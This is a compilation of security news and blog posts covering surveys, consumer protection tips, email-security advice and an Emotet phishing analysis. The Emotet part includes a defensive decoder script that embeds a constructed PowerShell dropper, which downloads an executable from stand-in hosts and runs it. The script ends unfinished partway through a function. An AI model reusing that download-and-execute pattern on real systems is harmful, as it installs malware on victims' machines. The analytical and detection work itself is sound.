A record 61 percent of enterprises worldwide are on the path to becoming “intelligent,” compared to only 49 percent in 2018. The Zebra Technologies Corporation global survey analyzes the extent to which companies connect the physical and digital worlds to drive innovation through real-time guidance, data-powered environments and collaborative mobile workflows. Their “Intelligent Enterprise” Index scores are calculated using 11 criteria that include Internet of Things (IoT) vision, adoption, data management, intelligent analysis and more. … More

The post Security still top priority as more enterprises scale IoT solutions company-wide appeared first on Help Net Security.

As car manufacturers focus on connectivity, hackers begin to exploit flaws

Car manufacturers offer more software features to consumers than ever before, and increasingly popular autonomous vehicles that require integrated software introduce security vulnerabilities. Widespread cloud connectivity and wireless technologies enhance vehicle functionality, safety, and reliability but expose cars to hacking exploits. In addition, the pressure to deliver products as fast as possible puts a big strain on the security capabilities of cars, manufacturing facilities, and automotive data, an IntSights report reveals. “The automotive manufacturing industry … More

The post As car manufacturers focus on connectivity, hackers begin to exploit flaws appeared first on Help Net Security.

Hack-ception: Benign Hacker Rescues 26M Stolen Credit Card Records

There’s something ironic about cybercriminals getting “hacked back.” BriansClub, one of the largest underground stores for buying stolen credit card data, has itself been hacked. According to researcher Brian Krebs, the data stolen from BriansClub encompasses more than 26 million credit and debit card records taken from hacked online and brick-and-mortar retailers over the past four years, including almost eight million records uploaded to the shop in 2019 alone.

Most of the records offered for sale on BriansClub are “dumps”: the data encoded on a card’s magnetic stripe, which cybercriminals can write onto any card-sized object with a magnetic stripe and then use to buy electronics, gift cards, and other easily resold goods. According to Krebs on Security, between 2015 and 2019, BriansClub sold approximately 9.1 million stolen credit cards, resulting in $126 million in sales.

Back in September, Krebs was contacted by a source who shared a plain text file with what they claimed to be the full database of cards for sale through BriansClub. The database was reviewed by multiple people who confirmed that the same credit card records could also be found in a simplified form by searching the BriansClub website with a valid account.

So, what happens when a cybercriminal, or a well-intentioned hacker in this case, wants control over these credit card records? When these online fraud marketplaces sell a stolen credit card record, that record is completely removed from the inventory of items for sale. So, when BriansClub lost its 26 million card records to a benign hacker, they also lost an opportunity to make $500 per card sold.

What good comes from “hacking back” instances like this? Besides the stolen records being taken off the internet for other cybercriminals to exploit, the data stolen from BriansClub was shared with multiple sources who work closely with financial institutions. These institutions help identify and monitor or reissue cards that show up for sale in the cybercrime underground. And while “hacking back” helps cut off potential credit card fraud, what are some steps users can take to protect their information from being stolen in the first place? Follow these security tips to help protect your financial and personal data:

  • Review your accounts. Be sure to look over your credit card and banking statements and report any suspicious activity as soon as possible.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Hack-ception: Benign Hacker Rescues 26M Stolen Credit Card Records appeared first on McAfee Blogs.

Chapter Preview: Ages 2 to 10 – The Formative Years

As our children venture into toddlerhood, they start to test us a bit. They tug at the tethers we create for them to see just how far they can push us. As they grow and learn, they begin to carve out a vision of the world for themselves—with your guidance, of course, so that they can learn how to live a safe and happy life both now and as they get older.

This is true in the digital world as well.

Typically, at around age two, our kids get their first taste of playing on mommy’s or daddy’s smartphone or tablet and discover an awesome new world of devices and online activities. It’s slow at first—a couple minutes here and there—but, over time, they spend more and more of their day online. You have an opportunity when your child has their first experience with a connected device to set the tone for what’s expected. This is a deliberate teaching moment, the first of many, where you explain how to go safely online and continue to reinforce these behaviors as they grow.

Just as at home and in school, these are children’s formative years in the digital world because there’s a significant increase in their access to devices and online engagement—whether it means watching videos, playing games, interacting with educational software, or many other activities. Keeping them safe in this environment needs to be top of mind, and that includes awareness of how their initial data puddle will rapidly become a data pond during these years. We need to be aware that this pond has direct ties to our privacy, their privacy, and, ultimately, to their life in general.

This chapter of “Is Your Digital Front Door Unlocked?” lays out several topics that, if done in healthy and constructive way, will make your child’s digital journey much more enjoyable. Topics such as the importance of rules, online etiquette, and the notion of “the talk” as it relates to going online safely are discussed in detail, in the hope of providing a framework that will grow as your child grows.

It also looks at challenges that every parent should be aware of, such as cyberbullying and the impact of screen time on your child. It also introduces the risks associated with online gaming for those just getting started.

I can’t express strongly enough the importance of engagement with your child during the formative years. This chapter will give you plenty of ideas of how to go about it in a way that both you and your child will enjoy.

Gary Davis’ book, Is Your Digital Front Door Unlocked?, is available September 5, 2019 and can be ordered at amazon.com.


The post Chapter Preview: Ages 2 to 10 – The Formative Years appeared first on McAfee Blogs.

Key challenges impacting IT audit pros navigating an evolving risk landscape

Protiviti and ISACA surveyed 2,252 chief audit executives (CAEs), internal audit professionals and IT audit vice presidents and directors worldwide. Asked to identify their biggest technology challenges, IT audit leaders and professionals noted the following as their top five: (1) IT security and privacy/cybersecurity; (2) data management and governance; (3) emerging technology and infrastructure changes (transformation/innovation/disruption); (4) staffing and skills challenges; (5) third-party/vendor management. “As much as organizations are focusing on cybersecurity and protecting their data, they’re still behind … More

The post Key challenges impacting IT audit pros navigating an evolving risk landscape appeared first on Help Net Security.

MSPs face increased risks and opportunities to rethink cybersecurity

Managed service providers (MSPs) and their small- and medium-sized business (SMB) customers lack the tools and resources needed to sufficiently defend against rising cyberattacks and threats, according to Continuum. Security shortcomings: the report found significant shortcomings in how MSPs offer cybersecurity, emphasizing the need for both MSPs and their SMB customers to reevaluate their cybersecurity strategies and identify effective solutions to bridge the widening IT skills gap. Conducted by Vanson Bourne, the study surveyed 200 MSPs … More

The post MSPs face increased risks and opportunities to rethink cybersecurity appeared first on Help Net Security.

1 in 5 SMBs have fallen victim to a ransomware attack

Ransomware remains the most common cyber threat to SMBs, according to a Datto survey of more than 1,400 MSP decision makers that manage the IT systems for small-to-medium-sized businesses. SMBs are a prime target: while it is used against businesses of all sizes, SMBs have become a prime target for attackers. The report uncovered a number of ransomware trends specifically impacting the SMB market: Ransomware attacks are pervasive. The number of ransomware attacks against SMBs … More

The post 1 in 5 SMBs have fallen victim to a ransomware attack appeared first on Help Net Security.

Executives are not actively engaged in ensuring the effectiveness of cybersecurity strategy

There’s a clear lack of accountability, especially on the board and among C-suite executives, and a lack of confidence in determining the efficacy of security technologies. AttackIQ and Ponemon Institute surveyed 577 IT and IT security practitioners in the United States who are knowledgeable about their organizations’ IT security strategy, tactics, and technology investments. “Enterprise culture is formed at the top. If enterprise leaders are not actively engaged in ensuring a strong cybersecurity posture, it … More

The post Executives are not actively engaged in ensuring the effectiveness of cybersecurity strategy appeared first on Help Net Security.

Top 6 email security best practices to protect against phishing attacks and business email compromise

Most cyberattacks start over email—a user is tricked into opening a malicious attachment, or into clicking a malicious link and divulging credentials, or into responding with confidential data. Attackers dupe victims by using carefully crafted emails to build a false sense of trust and/or urgency. And they use a variety of techniques to do this—spoofing trusted domains or brands, impersonating known users, using previously compromised contacts to launch campaigns and/or using compelling but malicious content in the email. In the context of an organization or business, every user is a target and, if compromised, a conduit for a potential breach that could prove very costly.

Whether it’s sophisticated nation-state attacks, targeted phishing schemes, business email compromise or ransomware attacks, such attacks are rising at an alarming rate and are also increasing in sophistication. It is therefore imperative that every organization’s security strategy include a robust email security solution.

So, what should IT and security teams be looking for in a solution to protect all their users, from frontline workers to the C-suite? Here are 6 tips to ensure your organization has a strong email security posture:

You need a rich, adaptive protection solution.

As security solutions evolve, bad actors quickly adapt their methodologies to go undetected. Polymorphic attacks designed to evade common protection solutions are becoming increasingly common. Organizations therefore need solutions that focus on zero-day and targeted attacks in addition to known vectors. Purely standards-based checks, or checks based only on known signatures and sender reputation, will not cut it.

Solutions that include rich detonation capabilities for files and URLs are necessary to catch payload-based attacks. Advanced machine learning models that look at the content and headers of emails as well as sending patterns and communication graphs are important to thwart a wide range of attack vectors including payload-less vectors such as business email compromise. Machine learning capabilities are greatly enhanced when the signal source feeding it is broad and rich; so, solutions that boast of a massive security signal base should be preferred. This also allows the solution to learn and adapt to changing attack strategies quickly which is especially important for a rapidly changing threat landscape.

Complexity breeds challenges. An easy-to-configure-and-maintain system reduces the chances of a breach.

Complicated email flows introduce moving parts that are difficult to sustain. As an example, complex mail-routing flows set up to enable protections for internal email can cause compliance and security challenges. Products that require unnecessary configuration bypasses to work can also cause security gaps. As an example, configurations put in place to guarantee delivery of certain types of email (e.g., phishing-simulation messages) are often poorly crafted and are exploited by attackers.

Solutions that protect both external and internal email and offer value without needing complicated configurations or email flows are a great benefit to organizations. In addition, look for solutions that offer easy ways to bridge the gap between the security teams and the messaging teams. Messaging teams, motivated by the desire to guarantee mail delivery, might create overly permissive bypass rules that impact security. The sooner these issues are caught, the better for overall security. Solutions that give the security teams insight when this happens can greatly reduce the time taken to rectify such flaws, thereby reducing the chances of a costly breach.

A breach isn’t an “If”, it’s a “When.” Make sure you have post-delivery detection and remediation.

No solution is 100% effective on the prevention vector because attackers are always changing their techniques. Be skeptical of any claims that suggest otherwise. Taking an ‘assume breach’ mentality will ensure that the focus is not only on prevention, but on efficient detection and response as well. When an attack does go through the defenses it is important for security teams to quickly detect the breach, comprehensively identify any potential impact and effectively remediate the threat.

Solutions that offer playbooks to automatically investigate alerts, analyze the threat, assess the impact, and take (or recommend) remediation actions are critical for effective and efficient response. In addition, security teams need a rich investigation and hunting experience to easily search the email corpus for specific indicators of compromise or other entities. Ensure that the solution allows security teams to hunt for threats and remove them easily.

Another critical component of effective response is ensuring that security teams have a strong signal source into what end users are seeing arrive in their inboxes. Having an effortless way for end users to report issues that automatically triggers security playbooks is key.

Your users are the target. You need a continuous model for improving user awareness and readiness.

An informed and aware workforce can dramatically reduce the number of occurrences of compromise from email-based attacks. Any protection strategy is incomplete without a focus on improving the level of awareness of end users.

A core component of this strategy is raising user awareness through phishing simulations, training users on what to look out for in suspicious emails so they don’t fall prey to actual attacks. Another, often overlooked, but equally critical component of this strategy is ensuring that the everyday applications end users work in help raise their awareness. Capabilities that offer users relevant cues, effortless ways to verify the validity of URLs, and an easy way to report suspicious emails within the application, all without compromising productivity, are very important.

Solutions that offer phishing simulation capabilities are key. Look for deep email-client integrations that allow users to view the original URL behind any link, regardless of any protection being applied. This helps users make informed decisions. In addition, having the ability to offer hints or tips to raise specific user awareness on a given email or site is also important. And effortless ways to report suspicious emails that in turn trigger automated response workflows are critical as well.
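The opening paragraph lists the tricks that these awareness cues have to surface, namely spoofed or look-alike sender domains and impersonated users, and this section adds the “original URL behind the link” check. The Python script below is an added example, not code from the original post or from Microsoft; it applies those three checks to one constructed message and one constructed clean message. The organisation directory, the trusted-domain list, the confusable-character table and both sample messages are assumptions made for the example.

```python
"""Header and link checks for phishing triage.

Added example; it is not code from the original post or from Microsoft.
KNOWN_PEOPLE, TRUSTED_DOMAINS and both sample messages are assumptions.
"""
import difflib
import re
from email import policy
from email.parser import BytesParser
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: people attackers like to impersonate, keyed by lower-cased display name.
KNOWN_PEOPLE = {"jane doe": "jane.doe@example.com"}
# Assumption: domains whose look-alikes we want to catch.
TRUSTED_DOMAINS = {"example.com", "bank.example"}
# Character swaps commonly used to build look-alike domains.
CONFUSABLES = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"))


def lookalike_of(domain):
    """Return the trusted domain `domain` imitates, or None if it is genuine or unrelated."""
    domain = domain.lower()
    if any(domain == t or domain.endswith("." + t) for t in TRUSTED_DOMAINS):
        return None  # the real domain or one of its subdomains
    folded = domain
    for fake, real in CONFUSABLES:
        folded = folded.replace(fake, real)
    for trusted in TRUSTED_DOMAINS:
        if folded == trusted or difflib.SequenceMatcher(None, folded, trusted).ratio() >= 0.85:
            return trusted
    return None


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def link_findings(html):
    """Flag links whose shown host differs from the real one, or whose host is a look-alike."""
    collector = _LinkCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.links:
        host = (urlparse(href).hostname or "").lower()
        shown = re.search(r"https?://([a-z0-9.-]+)", text, re.I)
        if shown and shown.group(1).lower() != host:
            findings.append(("LINK_TEXT_MISMATCH", f"text shows {shown.group(1)} but href goes to {host}"))
        imitated = lookalike_of(host) if host else None
        if imitated:
            findings.append(("LOOKALIKE_LINK_HOST", f"{host} imitates {imitated}"))
    return findings


def analyze(raw):
    """Run the header and link checks over one raw message; return a list of (tag, detail)."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    addresses = msg["From"].addresses if msg["From"] else ()
    display, addr = (addresses[0].display_name, addresses[0].addr_spec) if addresses else ("", "")
    sender_domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    # 1. Display-name impersonation: a known person's name over an address that is not theirs.
    expected = KNOWN_PEOPLE.get(display.strip().lower())
    if expected and addr.lower() != expected:
        findings.append(("DISPLAY_NAME_IMPERSONATION", f"'{display}' sent from {addr}, expected {expected}"))
    # 2. Look-alike sender domain.
    imitated = lookalike_of(sender_domain) if sender_domain else None
    if imitated:
        findings.append(("LOOKALIKE_SENDER_DOMAIN", f"{sender_domain} imitates {imitated}"))
    # 3. Links in the HTML body.
    body = msg.get_body(preferencelist=("html",))
    if body is not None:
        findings.extend(link_findings(body.get_content()))
    return findings


# Constructed sample: an executive impersonation with a digit-for-letter domain and a disguised link.
SAMPLE_PHISH = b"""From: "Jane Doe" <jane.doe@examp1e.com>
To: bob@example.com
Subject: Urgent: approve wire before noon
Content-Type: text/html; charset="utf-8"

<p>Bob, please approve this at <a href="http://examp1e.com/auth">https://portal.example.com</a> today.</p>
"""

# Constructed sample: the same person writing from the real domain with an honest link.
SAMPLE_CLEAN = b"""From: "Jane Doe" <jane.doe@example.com>
To: bob@example.com
Subject: Lunch menu
Content-Type: text/html; charset="utf-8"

<p>See <a href="https://portal.example.com/menu">https://portal.example.com/menu</a>.</p>
"""

if __name__ == "__main__":
    for name, raw in (("phish", SAMPLE_PHISH), ("clean", SAMPLE_CLEAN)):
        print(name, analyze(raw) or "no findings")
```

Two design points matter in practice. Subdomains of a trusted domain are accepted before any similarity test runs, otherwise short hosts such as m.example.com would be reported as look-alikes of their own parent; and the visible link text is only compared when it contains a URL, because text such as “click here” carries no host to compare, which is exactly why the client should still reveal the real destination on hover.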

Attackers meet users where they are. So must your security.

While email is the dominant attack vector, attackers and phishing attacks will go wherever users collaborate, communicate and keep their sensitive information. As forms of sharing, collaboration and communication other than email have become popular, attacks that target these vectors are increasing as well. For this reason, it is important to ensure that an organization’s anti-phishing strategy does not focus on email alone.

Ensure that the solution offers targeted protection capabilities for collaboration services that your organization uses. Capabilities like detonation that scan suspicious documents and links when shared are critical to protect users from targeted attacks. The ability in client applications to verify links at time-of-click offers additional protection regardless of how the content is shared with them. Look for solutions that support this capability.

Attackers don’t think in silos. Neither can the defenses.

Attackers target the weakest link in an organization’s defenses. They look for an initial compromise to get in, and once inside will look for a variety of ways to increase the scope and impact of the breach. They typically achieve this by trying to compromise other users, moving laterally within the organization, elevating privileges when possible, and finally reaching a system or data repository of critical value. As they proliferate through the organization, they will touch different endpoints, identities, mailboxes and services.

Reducing the impact of such attacks requires quick detection and response. And that can only be achieved when the defenses across these systems do not act in silos. This is why it is critical to have an integrated view into security solutions. Look for an email security solution that integrates well across other security solutions such as endpoint protection, CASB, identity protection, etc. Look for richness in integration that goes beyond signal integration, but also in terms of detection and response flows.


The post Top 6 email security best practices to protect against phishing attacks and business email compromise appeared first on Microsoft Security.

How to build a battle-ready cybersecurity team?

Estimated reading time: 3 minutes

Organizations and the people who run them are slowly perceiving cybersecurity to be a slightly different ball game than information security.

As global organizations grapple with cyber threats and aim to keep their enterprises safe from malware, hackers and other forms of threats, their understanding of this domain is getting richer every day.

Cybersecurity management cannot happen in isolation – appointing one security officer to handle everything in cybersecurity is not going to make an organization efficient or secure.

There needs to be a specialized team whose sole task should be to manage the entire paradigm of cybersecurity for a business.

If you are a CEO or a senior leader of an enterprise, reading this and agreeing to this, the next question you should ask is how to create a solid, efficient & battle-ready security team?

The following tips may help:

  1. Look for specialized resources and hire them

A Frost & Sullivan report observed that the global cybersecurity workforce will have more than 1.5 million unfilled positions by 2020. This indicates that there will be a substantial hiring gap when it comes to dealing with cybersecurity, and enterprises must be aware of that. To build a good team, there cannot be any gaps. If you’re a CISO or even a CEO, go hunting for specific, specialized cybersecurity skills in the market and leave no stone unturned until you find them. Make it clear to the organization that this is a hiring gap that needs to be filled whatever the cost. Once the skills are identified, move quickly and hire the personnel as soon as possible, before someone else gets to them.

  2. Assign responsibilities

There are different facets to cybersecurity, and if the hiring has been done right, the enterprise has people suited to those facets. But roles also need to be assigned properly, keeping employee capabilities in mind: ensure that there are enough people looking after essential cybersecurity functions such as patch updates, firewall management, endpoint security, insider threats and regular audits. Once people are aware of their roles, it is easier to form a plan and act accordingly.

  3. Conduct regular red team assessments

Think of cybersecurity personnel as virtual firefighters or disaster management specialists: most of their training takes place as simulations, in the hope that when a real incident happens, the personnel will be trained to take the appropriate measures. The same is true for your cybersecurity team. Regular assessments, including red team assessments (mock cyberattacks against your own defenses), must be conducted to build absolute readiness into your team. This will help make them battle-ready when an inevitable attack takes place.

  4. Keep upskilling

You have assembled a great cybersecurity team with perfect readiness to tackle the next cyberattack. Work is done, right? Not quite. A team tackling cyber threats is only as good as its knowledge today. Tomorrow’s cyber threats are continuously evolving, as criminals constantly innovate in their desperation to hit targets hard. Cybersecurity is a critical function that needs continuous upskilling in the form of training, self-education or anything else. The learning never stops in cybersecurity.

  5. Empower cybersecurity personnel

Security personnel cannot be lame ducks in an enterprise. If they are, all their skills and endurance will be wasted and the enterprise will be left carrying a high level of risk. These personnel must be empowered by their managers to act and take decisions in a field as dynamic as cyberattack prevention.

To complement a battle-ready security team, Seqrite offers a range of security solutions providing complete enterprise security. The company’s Endpoint Protection was recently awarded as the best in the world by AV-Test and comes preloaded with Data Loss Prevention (DLP) for advanced endpoint and data protection.

The post How to build a battle-ready cybersecurity team? appeared first on Seqrite Blog.

Code dependency mapping’s role in securing enterprise software

Enterprise software is only as good as its security. Today, a data breach costs $3.92 million on average. Organizations are expected to spend $124 billion on security in 2019 and will probably invest even more given the alarming rate at which cyberattacks are growing. Despite these investments, newer and more sophisticated threats are emerging every day, making the security of an enterprise’s software environment challenging – even for the most well-prepared. Fortunately, new innovations have … More

The post Code dependency mapping’s role in securing enterprise software appeared first on Help Net Security.

Microsegmentation for refining safety systems

When the TRITON (aka TRISIS) attack struck three refining sites in the Middle East in November of 2017, it was the first known cyber incident to target safety instrumented systems (SIS), specifically Schneider Electric’s Triconex gear. The consequences of these attacks were plant-wide shutdowns. While such shutdowns are costly, the consequences could have been far worse. Refineries rely on correctly functioning SIS equipment to prevent worker casualties and environmental disasters in the face of both … More

The post Microsegmentation for refining safety systems appeared first on Help Net Security.

When properly managed, shadow IT can benefit your organization

77 percent of IT professionals believe their organizations could earn an edge if company leaders were more collaborative with their businesses to find shadow IT solutions, according to a survey of 1000 US-based IT professionals by Entrust Datacard. As organizations adapt to changing technologies, employees are eager to use productivity solutions that help them function more efficiently — even if these solutions are outside the company’s IT rules and processes. This is the shadow IT … More

The post When properly managed, shadow IT can benefit your organization appeared first on Help Net Security.

How seriously are businesses taking their PKI security?

While most enterprises demonstrate a committed effort towards maintaining a well-rounded PKI setup, they still fall short in several key categories. The post-Black Hat survey report generated by AppViewX indicated that the primary reason for these shortfalls resided in the fact that most certificate- and PKI-processes were bound by silos, manual workflows, and a lack of synergy between systems. For instance, nearly 50% of the respondents admitted to still relying on passwords to safeguard private … More

The post How seriously are businesses taking their PKI security? appeared first on Help Net Security.

What is the Future of Cybersecurity?

Cybercrime is growing rapidly. The question now is how to stay ahead of a possible data breach. Experts in commercial real estate weigh in on what is in store for cybersecurity.

The recent Capital One breach is a case in point: a single individual accessed roughly 100 million credit card applications and customer accounts. Real estate executives have since started scrutinizing their own systems and data to determine how well protected they are against intrusion. Cybercrime damages are projected to reach trillions of dollars worldwide by 2021, so businesses need to stay on top of the situation.

Automation of building processes and functions has also increased the need for cybersecurity, and the spread of the Internet of Things pushes ever more building data into the cloud. Machine learning and artificial intelligence have made building operations more efficient and reduced the scope for human error, but every new connected system is also a new attack surface. With building technology changing daily, how does cybersecurity keep up?

Cybersecurity is not only a concern for computers and smartphones but for the entire building infrastructure. The commercial real estate industry often overlooks the security of its physical assets and focuses only on the connected devices of its employees. Attacks on building systems are increasingly common, yet many operators and owners only decide to spend on cybersecurity after an intrusion has already disrupted their business.

An attacker who reaches building systems can alter the security system, open or lock doors, or shut down the electricity. Too many building owners prioritize cybersecurity only when it is too late. IBM's 2019 Cost of a Data Breach Report found that it takes about 279 days on average to identify and contain a breach, and around 314 days when the breach is the result of a malicious attack.

Today's attacks are sophisticated and do not stop at technology and machines. Phishing schemes target high-level deal makers and executives. A cybercriminal may write to a manager claiming that payment has not been received for a transaction the manager recently closed. The organization may not be legally liable in this example, but the incident reflects poorly on it and can complicate future transactions.

In its recent Commercial Real Estate Outlook, Deloitte found that the top three effects of cybersecurity breaches are:

  • damage to reputation
  • financial fraud and theft
  • identity theft.

What’s missing?

According to experts, the only way to reduce cyber-attack risk to businesses and assets is to invest in an appropriate cybersecurity program. IBM estimated the average total cost of a data breach at about $3.9 million. Forming an incident response team and using encryption extensively can each lower the cost of a breach by about $360,000.

The success of a cybersecurity program depends on a sustainable plan that addresses the organization's specific risks. Real estate companies are not in the business of cybersecurity, but they still have to determine their risks, their limitations, and the budget available to counter cyber-attacks.

In a Deloitte survey, respondents reported the top three challenges of cybersecurity management as:

  • rising complexity and the accelerating pace of IT change
  • lack of a detailed response from management
  • ineffective security fixes due to interoperability and functionality issues

Extensive prevention programs need not be complicated. Executives must treat cybersecurity as an ongoing timeline rather than a one-time event.

IT organizations routinely assess risk across industries, yet the operational technology of buildings and its risks rarely get the same attention. Operators and owners must be proactive rather than reactive in preparing for cyber-attacks, and their security standards must keep pace with continually evolving building technology. Board members and leaders must therefore be kept in the loop so that security stays closely aligned with business strategy. They also need to conduct cyber risk assessments and scenario planning and make sure employees understand their responsibilities. Everyone must stay vigilant.

The significance of cybersecurity will only grow as threats and business scenarios become more complex, and regulatory oversight is likely to take a more active role that cuts across geographies.

The Cybersecurity Outlook

The compelling question is: who should be most responsible for the cybersecurity of a real estate company? Some argue that the data property owners collect from their tenants is the central issue, so protecting sensitive information and system data must be paramount and building management staff must be accountable for specific events. Others point to the IT department as the group that must put a robust cybersecurity program in place alongside the IT infrastructure.

Building owners and operators must understand the risks and recognize that every function and department has to be involved in preventing or mitigating cyber-attacks.

The best answer lies in the middle. Many experts believe that building operators and owners must work with outside vendors and their internal IT providers for every property they have, and draft a plan that protects both the physical assets and the network. The solution emerges when the pieces fit together, whether that means integrating a technology system into the real estate operation or vice versa.

Good cyber hygiene begins with data governance. In a building organization, cybersecurity is not an IT issue but a risk mitigation issue, and every individual and department has a significant role to play in thwarting attacks.

Final Remarks

Cybersecurity concerns everyone in the commercial real estate industry. Hackers and cybercriminals mount coordinated, sophisticated attacks that can compromise even well-secured IT infrastructure, so organizations must take decisive steps to counter them. Those that are not serious about protecting their infrastructure and physical assets lose more money, and that is not the only cost: they also lose credibility, and their reputation suffers when they fall victim to malicious and fraudulent attacks. Instituting a robust cybersecurity program is therefore a requirement, not a whim.

Report to Your Management with the Definitive ‘Incident Response for Management’ Presentation Template

Security incidents occur. It's not a matter of 'if' but of 'when.' There are security products and procedures that were implemented to optimize the IR process, so from the 'security-professional' angle, things are taken care of. However, many security pros who are doing an excellent job in handling incidents find effectively communicating the ongoing process with their management a much more

“Smart city” governments should also be smart about security

While the definition of “smart city” is still under debate, one thing is indisputable: the technologies used to make smart cities a reality are currently acquired and deployed after very little (or even no) security testing. Cesar Cerrudo, CTO at IOActive and board member of the Securing Smart Cities initiative, says that city governments – the buyers of these technologies – often blindly trust vendors when they say that their products are secure. They ask … More

The post “Smart city” governments should also be smart about security appeared first on Help Net Security.

Viewing cybersecurity incidents as normal accidents

As we continue on through National Cybersecurity Awareness Month (NCSAM), a time to focus on how cybersecurity is a shared responsibility that affects all Americans, one of the themes that I’ve been pondering is that of personal accountability. Years ago, I read Charles Perrow’s book, “Normal Accidents: Living with High-Risk Technologies,” which analyzes the social side of technological risk. When the book was first written in 1984, Perrow analyzed complex systems like nuclear power, aviation … More

The post Viewing cybersecurity incidents as normal accidents appeared first on Help Net Security.

Most expect the risk of privileged user abuse to increase

Insufficient privileged access management (PAM) practices continue to be a critical challenge for many organizations despite significant risks of data breaches and security incidents, according to Sila and Ponemon Institute. According to more than 650 North American respondents, 70 percent think it likely that privileged users within their organizations are accessing sensitive or confidential data for no discernible business need, and more than half expect privileged user abuse to increase in the next 12-24 months. Interestingly, … More

The post Most expect the risk of privileged user abuse to increase appeared first on Help Net Security.

Is Emotet gang targeting companies with external SOC?

Introduction

The group behind the Emotet malware is getting smarter and smarter in the way it delivers the malware. While the infection scheme has looked much the same for years, the way the group tries to infect victims improves from day to day.
Today I'd like to share a quick analysis of a very interesting email which claimed to deliver a SOC "weekly report" to the victim's mailbox. First of all, the attacker knew the target organization was protected by a SOC (Security Operation Center), so she sent a well-crafted email claiming to deliver a Microsoft Word document containing the weekly SOC report, as if it were routine activity, in order to induce the victim to open it.

SOC report 10 12 2019.doc (6125489453c1824da3e28a54708e7c77875e500dd82a59c96c1d1e5ee88dcad7) is the delivered file, sent on Oct 11, 2019, 11:06:09 PM from grecia@ambientehomedecor.com. I believe that ambientehomedecor.com is not a malicious domain but most likely a newly compromised one.

Technical Analysis

Hash: 6125489453c1824da3e28a54708e7c77875e500dd82a59c96c1d1e5ee88dcad7
Threat: Word document dropper (Emotet)
Brief description: First stage of an Emotet campaign targeting organizations with a Security Operation Center
Ssdeep: 6144:tkPNPASKUzSRnLx3Q4td9pB8LGme764XNNHBly:tkPNPAfUGRt3b3B8LGL6CNJ

Following the original email headers from grecia@ambientehomedecor.com to the victim's mailbox, it is possible to figure out that the attacker used an SMTP client that left a trace of the original sender IP address, which happens to be 81.48.36.59. According to IPLocation, that address is related to a very nice town in northern France: Thury-Harcourt.

Thury-Harcourt, France. Sender IP

The attached document is a well-obfuscated Microsoft Word document which asks the user to enable macros in order to view its content. The AutoOpen function begins a complex obfuscated chain which tries to deter analysts by introducing junk code, junk variable assignments and fake but plausible-looking comments. The following image shows the obfuscation technique. The function c878cxx90590 is the "real code": it is not part of the junk but the function that actually performs the malicious actions. As you can see, sitting in the middle of hundreds of similar lines of code, it is hard to spot.

Obfuscated Macro

The obfuscated macro creates in-memory objects and runs them without passing through temporary files. The following image shows the auto-run object created before the drop-and-execute step. The analysed variable in the image is c0639047895c6 which, in that specific run, holds the created Win32_ProcessStartup object used to establish persistence on the victim machine.

Object Building

Once the dropper has set up persistence so that it runs at start-up, it carves the following PowerShell script out of itself. The script runs an encoded string that hides the drop URLs. The base64-decoded string shows a simple foreach statement looping through a list of compromised websites hosting the real payload: de6a8b8612b5236a18eea1a6a8f53e117d046cf2ad95e079a6715af68f8d2216 (VT 6/69). It finally saves the dropped file in a user-profile location held in the variable xc0x57b38b2x7 before running it. The following image shows the PowerShell script before and after decoding, with a quick description.

Final Deobfuscated Dropper
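The decoding step described above is easy to automate when the same loader shape shows up in a process-creation event. The script below is an added example written for this page, not the author's own tooling and not the actual carved script: it pulls the base64 argument out of a powershell command line, decodes it as UTF-16LE (which is what -EncodedCommand expects, a common stumbling block when people try plain UTF-8), recovers the '@'-joined drop URLs and defangs them. The command line, the .invalid hosts and the file name are constructed for the example; only the variable name xc0x57b38b2x7 and the URL-list-split pattern come from the analysis above.

```python
import base64
import re
from urllib.parse import urlsplit

# Constructed stand-in for the carved dropper script (not the page's sample):
# same shape as the Emotet loader described above, with .invalid hosts.
SAMPLE_SCRIPT = (
    "$xc0x57b38b2x7=$env:userprofile+'\\'+'531.exe';"
    "$wc=New-Object System.Net.WebClient;"
    "$list='http://site-one.invalid/blogs/4x466v/@http://site-two.invalid/wp-content/dW0o3RoJNG/'.Split('@');"
    "foreach($u in $list){try{$wc.DownloadFile($u,$xc0x57b38b2x7);"
    "Invoke-Item $xc0x57b38b2x7;break}catch{}}"
)
# PowerShell's -EncodedCommand takes base64 over the UTF-16LE bytes of the script.
ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")
# Constructed command line, as it would appear in a process-creation event.
SAMPLE_CMDLINE = f"powershell -w hidden -noni -nop -enc {ENCODED}"

# -e, -ec, -en, -enc and -encodedcommand are the abbreviations seen in the wild;
# -ex (ExecutionPolicy) must not match, hence the whitespace requirement.
ENC_ARG_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/]+=*)",
                        re.IGNORECASE)
# Stop at '@' as well as quotes and whitespace: the loader joins URLs with '@'.
URL_RE = re.compile(r"https?://[^\s'\"@,;<>]+", re.IGNORECASE)


def find_encoded_command(cmdline: str):
    """Return the base64 argument of a powershell command line, or None."""
    m = ENC_ARG_RE.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16le")


def extract_urls(script: str):
    """Recover every download URL from the decoded loader."""
    return URL_RE.findall(script)


def defang(url: str) -> str:
    """Bracket the dots in the host part so the indicator cannot be clicked."""
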